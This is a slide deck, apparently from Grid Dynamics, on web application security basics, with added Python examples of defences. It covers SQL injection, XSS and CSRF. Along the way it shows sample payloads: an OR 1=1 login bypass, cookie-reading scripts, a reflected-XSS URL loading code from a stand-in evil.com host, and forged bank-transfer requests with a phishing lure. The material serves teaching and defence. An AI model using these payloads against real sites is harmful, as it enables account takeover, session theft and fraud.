Web Application Security

The document outlines the fundamentals of web application security, emphasizing the importance of protecting applications from vulnerabilities and threats that can compromise data integrity and user trust. It details common security risks such as SQL injection, Cross-Site Scripting (XSS), and Cross-Site Request Forgery (CSRF), along with prevention strategies for each. The conclusion stresses the need for a proactive approach to security through robust measures like input validation and regular updates to mitigate cyber threats.

Uploaded by

shpandey

www.griddynamics.com

Trusted engineering partner for digital transformation

Basics of Web Application Security


Grid Dynamics

March 2025
The Basics of Web Application Security
Common vulnerabilities and best practices for prevention
What is Web Application Security
Web Application Security
Web application security refers to the processes, strategies, and security measures designed to protect web applications.

● The aim is to safeguard applications from threats and vulnerabilities.
● If these threats are not addressed, they can lead to severe consequences such as disruption of functionality, breaches of data integrity and access management, and exposure of sensitive information.
Importance of Web Application Security
➢ Protects Data
➢ Ensures Business Continuity through Security
➢ Regulatory Compliance via Robust Web Application Security
➢ Maintains Trust and Reputation through Secure Practices
➢ Mitigates the Risk of Cyber Threats
➢ Enhances User Experience by Securing Web Applications
Common Web Application Security Risks
SQL Injection Attacks
➢ SQL injection, also known as SQLI, is a common attack vector that uses malicious
SQL code for backend database manipulation to access information that was not
intended to be displayed. This information may include any number of items,
including sensitive company data, user lists or private customer details.
● An attacker can use an SQL injection vulnerability to bypass application security and authenticate as the administrator.
● For example, an attacker could use a trick involving a single quote and set the passwd field to:
  password' OR 1=1

Because of the OR 1=1 condition, the WHERE clause matches every row, so the query returns the first id from the users table no matter what the username and password are. The first user id in a database is very often the administrator's. In this way, the attacker not only bypasses authentication but also gains administrator privileges.
Ways to Prevent SQL Injection

● The only sure way to prevent SQL injection attacks is input validation combined with parameterized queries, including prepared statements, e.g.:
$username = filter_var($_POST['username'], FILTER_SANITIZE_STRING);

● The application code should never use the input directly. The developer must
sanitize all input, not only web form inputs such as login forms.

● They must remove potential malicious code elements such as single quotes.

● It is also a good idea to turn off the visibility of database errors on your
production sites.
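An added example (not from the slides) contrasting the two approaches: a login query built by string concatenation beside the same query with bound parameters, run against a constructed in-memory SQLite table and fed the passwd value shown above. In the concatenated version the quote in the input is parsed as SQL and changes the statement (here it surfaces a database error, which is why the slides also recommend hiding database errors in production); in the parameterized version it is simply a wrong password.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite table with one admin row.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!')")
    return conn

def login_vulnerable(conn, username, password):
    # The input is spliced into the SQL text, so a quote in the input
    # changes the structure of the statement the database parses.
    sql = (f"SELECT id FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    # Placeholders: the statement is compiled first and the values are
    # bound afterwards, so they are only ever compared as data.
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def outcome(login, username, password):
    """Classify how a login function treats one input: 'authenticated',
    'rejected', or 'sql_error' (the input was parsed as part of the SQL)."""
    conn = make_db()
    try:
        user_id = login(conn, username, password)
    except sqlite3.OperationalError:
        return "sql_error"
    finally:
        conn.close()
    return "authenticated" if user_id is not None else "rejected"

if __name__ == "__main__":
    payload = "password' OR 1=1"  # the passwd value quoted on the slide
    for name, fn in (("vulnerable", login_vulnerable), ("safe", login_safe)):
        print(f"{name:10s} admin / S3cret!  -> {outcome(fn, 'admin', 'S3cret!')}")
        print(f"{name:10s} admin / {payload} -> {outcome(fn, 'admin', payload)}")
```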
Cross Site Scripting (XSS) Attacks
➢ Cross-site scripting (XSS) is an exploit where the attacker attaches code onto a
legitimate website that will execute when the victim loads the website.
➢ An attacker can use XSS to send a malicious script to an unsuspecting user.
The end user’s browser has no way to know that the script should not be
trusted, and will execute the script.
➢ The malicious script can access any cookies, session tokens, or other
sensitive information retained by the browser and used with that site.
Let’s analyze a simple example: consider a website with a search field.

If the search field is vulnerable, any script the user enters will be executed:

<script>alert('XSS')</script>

After clicking the “Search” button, the entered script is executed. As you can see in the example, the script typed into the search field gets executed; a more harmful script could be typed just as easily.

XSS attacks can also be done without a script tag, using any event handler such as onload or onmouseover:

<body onload=alert('something')>

<b onmouseover=alert('XSS testing!')></b>


Reflected XSS
This attack occurs when a malicious script is not being saved on the web server but is
reflected in the website’s results.
Consider a social media site that requires users to authenticate to send and view messages.
The website has a search function which displays the search string in the URL, like this:
http://socialize.com?search=latest&news
An attacker notices this and tries the following string as their search:
<script type='text/javascript'>alert('test');</script>
If the website does not properly sanitize inputs, this test script will appear in the URL, like
this:
http://socialize.com?query=<script type='text/javascript'>alert('test');</script>
And the script will execute, showing an alert box in the browser. This means the website is vulnerable to an XSS attack. Now the attacker can craft a URL that executes a malicious script from their own domain:
http://socialize.com?query=latest&news<script%20src="http://evil.com/malicious.js"
Stored XSS
This attack occurs when a malicious script is saved on the web server permanently.

The malicious script is submitted through a vulnerable input form (for example, a comment field or a review field). It is then stored in the database and executed on page load or when the corresponding function is called.

<script>alert(document.cookie)</script>

DOM XSS
This occurs when the DOM environment is modified by the attack, while the page’s own code remains the same.

In this example, the browser creates a DOM object in which the document location object contains the attacker-supplied string. In this way the DOM environment is affected.
Ways to Prevent XSS

Commonly used prevention methods include:

● Data validation - everything entered by the user should be precisely validated, because the user’s input may find its way into the output.
● Filtering - search for risky keywords in the user’s input and remove them or replace them with empty strings.
● Escaping - characters with special meaning are replaced by special codes. For example, the escaped form of < looks like &#60;.
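An added example (not from the slides) comparing the filtering and escaping defences above against the two payloads quoted on the earlier XSS slides: stripping <script> tags leaves the onmouseover payload intact, while escaping with numeric references like the slide’s &#60; neutralizes both.

```python
import re

# Constructed sample input: the two payloads shown on the XSS slides.
SCRIPT_PAYLOAD = "<script>alert('XSS')</script>"
EVENT_PAYLOAD = "<b onmouseover=alert('XSS testing!')></b>"

# HTML-significant characters mapped to numeric character references,
# in the style of the slide's example (< becomes &#60;).
_ESCAPES = {"&": "&#38;", "<": "&#60;", ">": "&#62;", '"': "&#34;", "'": "&#39;"}

def filter_script_tags(text):
    """Filtering as the slide describes it: delete <script> tags, keep the rest."""
    return re.sub(r"</?script[^>]*>", "", text, flags=re.IGNORECASE)

def escape_html(text):
    """Escaping: every character with HTML meaning becomes a character reference,
    so the browser displays the input as text instead of parsing it as markup."""
    return "".join(_ESCAPES.get(ch, ch) for ch in text)

def contains_tag(html):
    """True if the string still holds something the browser would parse as a tag
    (covers both <script> elements and elements carrying onload/onmouseover)."""
    return re.search(r"<[a-zA-Z][^>]*>", html) is not None

def render_results(query, defence):
    """The search-results snippet from the slides, with the chosen defence applied."""
    return f"<p>Results for: {defence(query)}</p>"

if __name__ == "__main__":
    for name, defence in (("filter", filter_script_tags), ("escape", escape_html)):
        for payload in (SCRIPT_PAYLOAD, EVENT_PAYLOAD):
            state = "STILL ACTIVE" if contains_tag(defence(payload)) else "inert"
            print(f"{name:7s} {state:12s} {render_results(payload, defence)}")
```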
Cross Site Request Forgery(CSRF) Attacks
➢ Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute
unwanted actions on a web application in which they’re currently authenticated.
○ The attacker sends users of a web application a link by email that tricks them into executing actions of the attacker’s choosing.
○ A successful CSRF attack can force the user to perform state changing requests
like transferring funds, changing their email address, and so forth.
CSRF Attack Examples

Forged GET request


The original request:
GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1
The attacker’s forged request, in which the attacker changes the account number to their own account and increases the transfer amount to 100,000:
http://bank.com/transfer.do?acct=MARIA&amount=100000
Now the attacker needs to trick the victim into visiting this forged URL while signed into the banking application. The attacker might draft an email like this:

To: Victim
Subject: A gift of flowers for you!

Hello victim,
We know your birthday is coming up and have a special gift for you. Just click here to receive it!

The link “click here” would lead to the forged URL shown above.
CSRF Attack Examples

Forged POST request


If the banking application uses POST requests, the user’s original operation would look like this:

POST http://acmebank.com/fundtransfer HTTP/1.1

acct=344344&amount=5000

In this case, the attacker would need to craft a <form> element with the forged request:

<form action="http://acmebank.com/fundtransfer" method="POST">
<input type="hidden" name="acct" value="224224"/>
<input type="hidden" name="amount" value="50000"/>
<input type="submit" value="Click to get your free gift!"/>
</form>

When the user submits the form, the illicit transfer is carried out.
Preventing CSRF Attacks

● Use anti-CSRF tokens
● Use the SameSite cookie attribute
● Avoid GET requests for state changes
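An added example (not from the slides) modelling the three defences as checks in a fund-transfer handler; Session, session_cookie_header and handle_transfer are constructed stand-ins, not a real framework’s API. The forged form from the previous slide is rejected because it carries no token, and a GET version of the transfer is rejected outright.

```python
import hmac
import secrets

class Session:
    """Constructed stand-in for a server-side session (hypothetical)."""
    def __init__(self):
        # One unpredictable token per session; the forged form on another
        # origin has no way to read it.
        self.csrf_token = secrets.token_urlsafe(32)

def session_cookie_header(session_id):
    """SameSite=Lax: the browser omits this cookie on cross-site POSTs, so a form
    auto-submitted from evil.com arrives without the victim's session."""
    return f"Set-Cookie: sid={session_id}; HttpOnly; Secure; SameSite=Lax"

def render_transfer_form(session):
    """The legitimate form embeds the session's token as a hidden field."""
    return (f'<input type="hidden" name="csrf_token" '
            f'value="{session.csrf_token}"/>')

def handle_transfer(session, method, form):
    """Return (status, message) for a transfer request; form is a dict of fields."""
    if method != "POST":
        # State changes are never accepted over GET, so a forged link cannot trigger them.
        return 405, "state changes must not be made with GET"
    token = form.get("csrf_token", "")
    # Constant-time comparison against the token issued to this session.
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return 403, "missing or invalid CSRF token"
    return 200, f"transferred {form['amount']} to {form['acct']}"

if __name__ == "__main__":
    s = Session()
    print(session_cookie_header("sid-demo"))
    # Forged form from the slide: no token, so it is refused.
    print(handle_transfer(s, "POST", {"acct": "224224", "amount": "50000"}))
    # Legitimate submission carrying the token rendered into the real form.
    print(handle_transfer(s, "POST", {"acct": "344344", "amount": "5000",
                                      "csrf_token": s.csrf_token}))
```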
Conclusion
Securing web applications is a complex task that requires a proactive and comprehensive approach.

By implementing robust security measures such as input validation, strong authentication protocols,
secure data transmission, and regular software updates, organizations can significantly reduce the
risk of cyber threats.

Embracing these practices not only protects sensitive data but also fosters trust with users and
stakeholders.

Thank you!
Q&A
